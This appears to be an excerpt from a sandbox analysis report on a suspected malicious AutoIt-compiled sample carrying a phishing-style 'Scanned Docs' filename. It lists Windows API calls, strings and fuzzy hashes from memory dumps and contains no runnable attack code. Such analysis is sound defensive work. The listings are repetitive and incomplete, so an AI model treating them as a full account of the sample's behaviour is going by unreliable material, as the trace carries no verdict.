                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 0ed9f2f5216744bee9ea3ed20195fea796aeda093c5e2aea37aa2e5cb5103226
                                                      • Instruction ID: d81d677f1470e77ae9a64632c6a180cca71ce4545428c34b1d5131eda68e09f3
                                                      • Opcode Fuzzy Hash: 0ed9f2f5216744bee9ea3ed20195fea796aeda093c5e2aea37aa2e5cb5103226
                                                      • Instruction Fuzzy Hash: 26417F35A10219AFDB01DFA4D8549EEBBB9FF08344F00806AE946A7361DB30AD55CFA4
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 002E9CA1
                                                      • GetAsyncKeyState.USER32(000000A0), ref: 002E9D22
                                                      • GetKeyState.USER32(000000A0), ref: 002E9D3D
                                                      • GetAsyncKeyState.USER32(000000A1), ref: 002E9D57
                                                      • GetKeyState.USER32(000000A1), ref: 002E9D6C
                                                      • GetAsyncKeyState.USER32(00000011), ref: 002E9D84
                                                      • GetKeyState.USER32(00000011), ref: 002E9D96
                                                      • GetAsyncKeyState.USER32(00000012), ref: 002E9DAE
                                                      • GetKeyState.USER32(00000012), ref: 002E9DC0
                                                      • GetAsyncKeyState.USER32(0000005B), ref: 002E9DD8
                                                      • GetKeyState.USER32(0000005B), ref: 002E9DEA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: State$Async$Keyboard
                                                      • String ID:
                                                      • API String ID: 541375521-0
                                                      • Opcode ID: 40b4e4bc018837df9799e3125f836a68afb73c41c454ab36ce58e244b4c69a35
                                                      • Instruction ID: 9507976639ddb9d7f41e04ba04aaaba0756ff67c02022bc85926a52183c54bd5
                                                      • Opcode Fuzzy Hash: 40b4e4bc018837df9799e3125f836a68afb73c41c454ab36ce58e244b4c69a35
                                                      • Instruction Fuzzy Hash: EB410B305A47CB6DFF31AF6688043F5BEE16F16304F88905BCAC6561C2D7A499E4C792
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 003005BC
                                                      • inet_addr.WSOCK32(?), ref: 0030061C
                                                      • gethostbyname.WSOCK32(?), ref: 00300628
                                                      • IcmpCreateFile.IPHLPAPI ref: 00300636
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003006C6
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003006E5
                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 003007B9
                                                      • WSACleanup.WSOCK32 ref: 003007BF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: a6d7381f1e889be0c465fe4bfaeb3052966178c96a87b221acb24b599e5b342e
                                                      • Instruction ID: fd21355193dd1ec134f424c956aefd5f40cd007965d2ca70c0f1fc2f12958f16
                                                      • Opcode Fuzzy Hash: a6d7381f1e889be0c465fe4bfaeb3052966178c96a87b221acb24b599e5b342e
                                                      • Instruction Fuzzy Hash: 7291BD34609201AFD326DF14C898F1ABBE4AF49318F1585A9E4698BAE2C734EC41CF91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 707087890-567219261
                                                      • Opcode ID: e3272d9f5377d812daa93d5ce5c8577190cd574e4af3299b72382edf1e8cd256
                                                      • Instruction ID: 8b6c3a5317d1f8326edc7274ca1bbf39323f652fdbed46c11829908ad21392f7
                                                      • Opcode Fuzzy Hash: e3272d9f5377d812daa93d5ce5c8577190cd574e4af3299b72382edf1e8cd256
                                                      • Instruction Fuzzy Hash: 9751D631A025169BCF15EF6CC9608BEB7A5BF65314B264229E495E72C0DF30ED40CB90
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 00303774
                                                      • CoUninitialize.OLE32 ref: 0030377F
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,0031FB78,?), ref: 003037D9
                                                      • IIDFromString.OLE32(?,?), ref: 0030384C
                                                      • VariantInit.OLEAUT32(?), ref: 003038E4
                                                      • VariantClear.OLEAUT32(?), ref: 00303936
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: 89b13ff8aca5c1422ea44d37c4364b40622472eea1560fb46a0fcdf1d0648a40
                                                      • Instruction ID: 8ad11e482d6f33a53b67ea6f6739f92b22d5696227334f004fd9341a1ff3922d
                                                      • Opcode Fuzzy Hash: 89b13ff8aca5c1422ea44d37c4364b40622472eea1560fb46a0fcdf1d0648a40
                                                      • Instruction Fuzzy Hash: AE61BF71609301AFD312DF54C898BAAB7ECEF49714F104849F9859B2D1C770EE48CB92
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002F33CF
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002F33F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-3080491070
                                                      • Opcode ID: bda9414a31c64824d3bf26a5ca0daedd5cad1495fa0ef08cf12aed57867c47fc
                                                      • Instruction ID: 8a69119c6096714e40f8f1c30bc64ff6c9145a3488f7aa412bf916e55bb47fa7
                                                      • Opcode Fuzzy Hash: bda9414a31c64824d3bf26a5ca0daedd5cad1495fa0ef08cf12aed57867c47fc
                                                      • Instruction Fuzzy Hash: 7651917591120AAADF15FBA0CD56EFEB378AF08740F144065F505720A2EB356FA8CF61
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 1256254125-769500911
                                                      • Opcode ID: 4fc57eef2202a555f1b6bf3c6dcc4a8b619fcf73c0a1967bf6b477e60744d83c
                                                      • Instruction ID: c311559caa3ae1238d35f605407d5a137ca6032a608ae8228b4f757cc518a497
                                                      • Opcode Fuzzy Hash: 4fc57eef2202a555f1b6bf3c6dcc4a8b619fcf73c0a1967bf6b477e60744d83c
                                                      • Instruction Fuzzy Hash: AE41FB32A600679BCB216F7FC8905BFB7A9BFA1754B644129E421DB284E731CDA1C790
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 002F53A0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002F5416
                                                      • GetLastError.KERNEL32 ref: 002F5420
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 002F54A7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: f9f9159185434334e6f06b5bf30549bca65ebaea5777004f9879b77c7b266d08
                                                      • Instruction ID: e82d80747845f90c3f7f27b6bcadec1f06f5194aea2cfebc91deb4f818dd1c66
                                                      • Opcode Fuzzy Hash: f9f9159185434334e6f06b5bf30549bca65ebaea5777004f9879b77c7b266d08
                                                      • Instruction Fuzzy Hash: 1C31B139A206199FC711DF68C485AB9FBF8EB05345F148069E601CB292D770ED92CBA1
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00313C79
                                                      • SetMenu.USER32(?,00000000), ref: 00313C88
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00313D10
                                                      • IsMenu.USER32(?), ref: 00313D24
                                                      • CreatePopupMenu.USER32 ref: 00313D2E
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00313D5B
                                                      • DrawMenuBar.USER32 ref: 00313D63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: 394d455ba5ba2d855731bd6c5bbd8975c5a09a19d059a8b75824d6241362bd91
                                                      • Instruction ID: b2a3168b1d139d48f89ed9f1a863d8cc56542e0d3de86efaf4231c9c9bddbc43
                                                      • Opcode Fuzzy Hash: 394d455ba5ba2d855731bd6c5bbd8975c5a09a19d059a8b75824d6241362bd91
                                                      • Instruction Fuzzy Hash: 2B418A78A01209EFDB19CF64E844AEA7BBAFF4D304F144028E90697360D730AA10CF94
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00313A9D
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00313AA0
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00313AC7
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00313AEA
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00313B62
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00313BAC
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00313BC7
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00313BE2
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00313BF6
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00313C13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: 1e0cd3dc9d36c122d9eee5e7e622e50e704edbd46be370d4f199a68b9eda6898
                                                      • Instruction ID: bdd79a40e9a9180a3a5c531a84d9c2dc85e7a96c216983c65dc198aff52f86df
                                                      • Opcode Fuzzy Hash: 1e0cd3dc9d36c122d9eee5e7e622e50e704edbd46be370d4f199a68b9eda6898
                                                      • Instruction Fuzzy Hash: 26618D75900248AFDB12DFA8CC81EEE77F8EB0D710F144199FA15A72A1D770AE85DB50
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 002EB151
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB165
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 002EB16C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB17B
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 002EB18D
                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1B8
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB1FD
                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB212
                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,002EA1E1,?,00000001), ref: 002EB21D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 4a241b2b5d1991d0dbb17e2acf891cc447f19a66a30ad0f049cf23c9098d7c60
                                                      • Instruction ID: 6d0f43384c518966895e641530402358132a6bb959564e132b075fbb7038471b
                                                      • Opcode Fuzzy Hash: 4a241b2b5d1991d0dbb17e2acf891cc447f19a66a30ad0f049cf23c9098d7c60
                                                      • Instruction Fuzzy Hash: 3931BA755A0305AFDB139F25DC48BEA7BADAF14352F908004FA06CB1A0D7B49A108F64
                                                      APIs
                                                      • _free.LIBCMT ref: 002B2C94
                                                        • Part of subcall function 002B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000), ref: 002B29DE
                                                        • Part of subcall function 002B29C8: GetLastError.KERNEL32(00000000,?,002BD7D1,00000000,00000000,00000000,00000000,?,002BD7F8,00000000,00000007,00000000,?,002BDBF5,00000000,00000000), ref: 002B29F0
                                                      • _free.LIBCMT ref: 002B2CA0
                                                      • _free.LIBCMT ref: 002B2CAB
                                                      • _free.LIBCMT ref: 002B2CB6
                                                      • _free.LIBCMT ref: 002B2CC1
                                                      • _free.LIBCMT ref: 002B2CCC
                                                      • _free.LIBCMT ref: 002B2CD7
                                                      • _free.LIBCMT ref: 002B2CE2
                                                      • _free.LIBCMT ref: 002B2CED
                                                      • _free.LIBCMT ref: 002B2CFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 1e744395f883fa3a9d33623f9cf6656f6e9ac9c4027a2e9d4f3befebecdadfec
                                                      • Instruction ID: a8b8e7619b809dc2161e4ac401b8c65c8afd35d69bbc7176d2ca81616e5e9bb3
                                                      • Opcode Fuzzy Hash: 1e744395f883fa3a9d33623f9cf6656f6e9ac9c4027a2e9d4f3befebecdadfec
                                                      • Instruction Fuzzy Hash: 6D119676120608FFCB02EF54D942DDD3BA5FF05390F5158A5FA485B222DA31EA649F90
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00281459
                                                      • OleUninitialize.OLE32(?,00000000), ref: 002814F8
                                                      • UnregisterHotKey.USER32(?), ref: 002816DD
                                                      • DestroyWindow.USER32(?), ref: 002C24B9
                                                      • FreeLibrary.KERNEL32(?), ref: 002C251E
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002C254B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00285C7A
                                                        • Part of subcall function 00285D0A: GetClientRect.USER32(?,?), ref: 00285D30
                                                        • Part of subcall function 00285D0A: GetWindowRect.USER32(?,?), ref: 00285D71
                                                        • Part of subcall function 00285D0A: ScreenToClient.USER32(?,?), ref: 00285D99
                                                      • GetDC.USER32 ref: 002C46F5
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002C4708
                                                      • SelectObject.GDI32(00000000,00000000), ref: 002C4716
                                                      • SelectObject.GDI32(00000000,00000000), ref: 002C472B
                                                      • ReleaseDC.USER32(?,00000000), ref: 002C4733
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002C47C4
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002F35E4
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • LoadStringW.USER32(00352390,?,00000FFF,?), ref: 002F360A
                                                      Similarity
                                                      • API ID: LoadString$_wcslen
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 4099089115-2391861430
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002FC272
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002FC29A
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002FC2CA
                                                      • GetLastError.KERNEL32 ref: 002FC322
                                                      • SetEvent.KERNEL32(?), ref: 002FC336
                                                      • InternetCloseHandle.WININET(00000000), ref: 002FC341
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                      • API String ID: 3113390036-3916222277
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002C3AAF,?,?,Bad directive syntax error,0031CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002E98BC
                                                      • LoadStringW.USER32(00000000,?,002C3AAF,?), ref: 002E98C3
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002E9987
                                                      Similarity
                                                      • API ID: HandleLoadMessageModuleString_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                      • API String ID: 858772685-4153970271
                                                      APIs
                                                      • GetParent.USER32 ref: 002E20AB
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 002E20C0
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002E214D
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1290815626-3381328864
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • API String ID: 1282221369-0
                                                      APIs
                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00315186
                                                      • ShowWindow.USER32(?,00000000), ref: 003151C7
                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 003151CD
                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003151D1
                                                        • Part of subcall function 00316FBA: DeleteObject.GDI32(00000000), ref: 00316FE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0031520D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0031521A
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0031524D
                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00315287
                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00315296
                                                      Similarity
                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                      • API String ID: 3210457359-0
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 002D6890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002D68A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002D68B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002D68D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002D68F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00298874,00000000,00000000,00000000,000000FF,00000000), ref: 002D6901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002D691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00298874,00000000,00000000,00000000,000000FF,00000000), ref: 002D692D
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
